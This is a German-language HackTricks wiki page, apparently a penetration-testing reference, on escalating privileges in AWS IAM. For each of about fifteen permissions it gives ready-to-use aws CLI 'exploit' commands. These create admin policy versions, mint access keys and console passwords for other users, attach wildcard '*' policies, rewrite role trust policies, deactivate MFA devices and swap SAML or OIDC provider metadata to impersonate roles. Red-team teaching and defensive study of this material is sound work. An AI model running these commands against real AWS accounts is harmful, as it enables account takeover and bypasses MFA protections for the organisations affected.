AWS - IAM Privesc

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

Überprüfe die Abonnementpläne!
Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
Teile Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud GitHub-Repos einreichst.

IAM

Für mehr Informationen über IAM siehe:

AWS - IAM, Identity Center & SSO Enum

`iam:CreatePolicyVersion`

Gewährt die Fähigkeit, eine neue IAM-Policy-Version zu erstellen, wodurch die Notwendigkeit der iam:SetDefaultPolicyVersion-Berechtigung durch Verwendung des --set-as-default-Flags umgangen wird. Dies ermöglicht die Definition benutzerdefinierter Berechtigungen.

Exploit-Befehl:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Auswirkung: Eskaliert direkt die Privilegien, indem es jede Aktion auf jede Ressource erlaubt.

`iam:SetDefaultPolicyVersion`

Ermöglicht das Ändern der Standardversion einer IAM-Richtlinie zu einer anderen vorhandenen Version, was potenziell die Privilegien eskalieren kann, wenn die neue Version mehr Berechtigungen hat.

Bash-Befehl:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Auswirkung: Indirekte Privilegieneskalation durch Aktivierung weiterer Berechtigungen.

`iam:CreateAccessKey`

Ermöglicht das Erstellen einer Zugangs-ID und eines geheimen Zugangsschlüssels für einen anderen Benutzer, was zu einer potenziellen Privilegieneskalation führen kann.

Ausnutzung:

aws iam create-access-key --user-name <target_user>

Auswirkung: Direkte Privilegieneskalation durch Übernahme der erweiterten Berechtigungen eines anderen Benutzers.

`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`

Erlaubt das Erstellen oder Aktualisieren eines Login-Profils, einschließlich der Festlegung von Passwörtern für die AWS-Konsole, was zu einer direkten Privilegieneskalation führt.

Exploit für Erstellung:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Exploit für Update:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Auswirkung: Direkte Privilegieneskalation durch Anmeldung als "jeder" Benutzer.

`iam:UpdateAccessKey`

Ermöglicht das Aktivieren eines deaktivierten Zugangsschlüssels, was zu unbefugtem Zugriff führen kann, wenn der Angreifer den deaktivierten Schlüssel besitzt.

Ausnutzung:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Auswirkung: Direkte Privilegieneskalation durch Reaktivierung von Zugangsschlüsseln.

`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`

Ermöglicht das Erstellen oder Zurücksetzen von Anmeldeinformationen für bestimmte AWS-Dienste (z.B. CodeCommit, Amazon Keyspaces), wobei die Berechtigungen des zugehörigen Benutzers übernommen werden.

Exploit für Erstellung:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Exploit für Reset:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Auswirkung: Direkte Privilegieneskalation innerhalb der Dienstberechtigungen des Benutzers.

`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`

Ermöglicht das Anhängen von Richtlinien an Benutzer oder Gruppen, wodurch Privilegien direkt eskaliert werden, indem die Berechtigungen der angehängten Richtlinie übernommen werden.

Exploit für Benutzer:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Exploit für Gruppe:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Auswirkung: Direkte Privilegieneskalation auf alles, was die Richtlinie gewährt.

`iam:AttachRolePolicy`, ( `sts:AssumeRole`|`iam:createrole`) | `iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`

Erlaubt das Anhängen oder Hinzufügen von Richtlinien zu Rollen, Benutzern oder Gruppen, wodurch eine direkte Privilegieneskalation durch Gewährung zusätzlicher Berechtigungen ermöglicht wird.

Exploit für Rolle:

bashCopy codeaws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Exploit für Inline Policies:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

Du kannst eine Richtlinie wie die folgende verwenden:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}

Impact: Direkte Privilegieneskalation durch Hinzufügen von Berechtigungen über Richtlinien.

`iam:AddUserToGroup`

Ermöglicht das Hinzufügen zu einer IAM-Gruppe, wodurch Privilegien durch die Übernahme der Berechtigungen der Gruppe eskaliert werden.

Exploit:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Auswirkung: Direkte Privilegieneskalation auf das Niveau der Berechtigungen der Gruppe.

`iam:UpdateAssumeRolePolicy`

Erlaubt das Ändern des Assume-Role-Policy-Dokuments einer Rolle, wodurch die Annahme der Rolle und ihrer zugehörigen Berechtigungen ermöglicht wird.

Exploit:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Wo die Richtlinie wie folgt aussieht, was dem Benutzer die Berechtigung gibt, die Rolle zu übernehmen:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Auswirkung: Direkte Privilegieneskalation durch Übernahme der Berechtigungen einer beliebigen Rolle.

`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`

Erlaubt das Hochladen eines SSH-öffentlichen Schlüssels zur Authentifizierung bei CodeCommit und das Deaktivieren von MFA-Geräten, was zu einer potenziellen indirekten Privilegieneskalation führen kann.

Exploit für SSH-Schlüssel-Upload:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Exploit für MFA-Deaktivierung:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Auswirkung: Indirekte Privilegieneskalation durch Aktivierung des CodeCommit-Zugriffs oder Deaktivierung des MFA-Schutzes.

`iam:ResyncMFADevice`

Erlaubt die Resynchronisierung eines MFA-Geräts, was potenziell zu einer indirekten Privilegieneskalation durch Manipulation des MFA-Schutzes führen kann.

Bash-Befehl:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Auswirkung: Indirekte Privilegieneskalation durch Hinzufügen oder Manipulieren von MFA-Geräten.

`iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)

Mit diesen Berechtigungen können Sie die XML-Metadaten der SAML-Verbindung ändern. Dann könnten Sie die SAML-Föderation missbrauchen, um sich mit jeder Rolle, die ihr vertraut, anzumelden.

Beachten Sie, dass legitime Benutzer sich nicht anmelden können, wenn Sie dies tun. Sie könnten jedoch die XML erhalten, Ihre eigene einfügen, sich anmelden und die vorherige wiederherstellen.

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

TODO: Ein Tool, das in der Lage ist, die SAML-Metadaten zu generieren und sich mit einer angegebenen Rolle anzumelden

`iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:GetOpenIDConnectProvider`)

(Nicht sicher darüber) Wenn ein Angreifer diese Berechtigungen hat, könnte er einen neuen Thumbprint hinzufügen, um sich in allen Rollen anzumelden, die dem Anbieter vertrauen.

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

Referenzen

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

Überprüfe die Abonnementpläne!
Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
Teile Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud GitHub-Repos einreichst.

PreviousAWS - Glue Privesc NextAWS - KMS Privesc

Last updated 1 month ago

IAM

iam:CreatePolicyVersion

iam:SetDefaultPolicyVersion

iam:CreateAccessKey

iam:CreateLoginProfile | iam:UpdateLoginProfile

iam:UpdateAccessKey

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

iam:AttachUserPolicy || iam:AttachGroupPolicy

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

iam:AddUserToGroup

iam:UpdateAssumeRolePolicy

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

iam:ResyncMFADevice

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)